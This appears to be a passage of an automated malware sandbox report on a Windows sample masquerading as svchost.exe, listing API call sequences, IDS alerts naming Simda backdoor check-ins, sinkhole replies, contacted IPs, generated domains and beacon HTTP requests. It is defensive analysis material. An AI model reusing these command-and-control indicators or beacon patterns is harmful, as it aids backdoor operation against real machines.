Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57343 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57350 version: TLS 1.2
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nFjEHtbDTFjy.exe, 00000005.00000000.1672686954.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000006.00000002.1795769994.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000007.00000002.1780570957.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000B.00000002.1782306415.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000E.00000002.1690242673.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000010.00000002.1703422798.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000015.00000002.1707411843.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000018.00000000.1704279183.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001A.00000002.1712407341.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001C.00000000.1711075961.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001E.00000002.1719589028.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000020.00000000.1717183667.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000022.00000002.1729620714.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000024.00000002.1732605635.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000026.00000000.1731444284.000000000014E000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AD120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_006B9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_006BDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_006BDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AE6B0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00697680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_00697680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_014F9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014ED120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_014FDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_014FDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_014D7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014EE6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB

Networking

barindex
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.9:65460
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49718 -> 69.162.80.55:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49719 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49707 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49712 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49710 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49724 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49716 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49725 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.9:49710
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.9:49710
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49711 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49708 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49743 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49714 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:60798 -> 103.224.212.108:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49726 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49717 -> 5.79.71.225:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49709 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49721 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:60799 -> 15.197.240.20:80
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.9:49714
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49744 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.9:49714
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49750 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49752 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49715 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49745 -> 103.150.11.230:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49742 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:49709
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:60800 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:49709
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49713 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:63309 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:63307 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:63308 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49751 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57334 -> 69.162.80.55:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:63311 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57341 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:63310 -> 52.34.198.229:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57342 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.9:63310
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.9:63310
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57347 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57348 -> 103.150.11.230:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57337 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57338 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57354 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57352 -> 103.224.212.108:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57340 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57339 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57345 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57353 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57055 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57054 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57346 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57336 -> 3.64.163.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57335 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49722 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49720 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49746 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49748 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57350 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57344 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57351 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:57343 -> 188.114.96.3:443
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.36.143 8001Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.108 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: gaqycow.com
Source: C:\Windows\apppatch\svchost.exeDomain query: pujygaq.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 5.79.71.225 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumyliq.com
Source: C:\Windows\apppatch\svchost.exeDomain query: vocymut.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.55 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
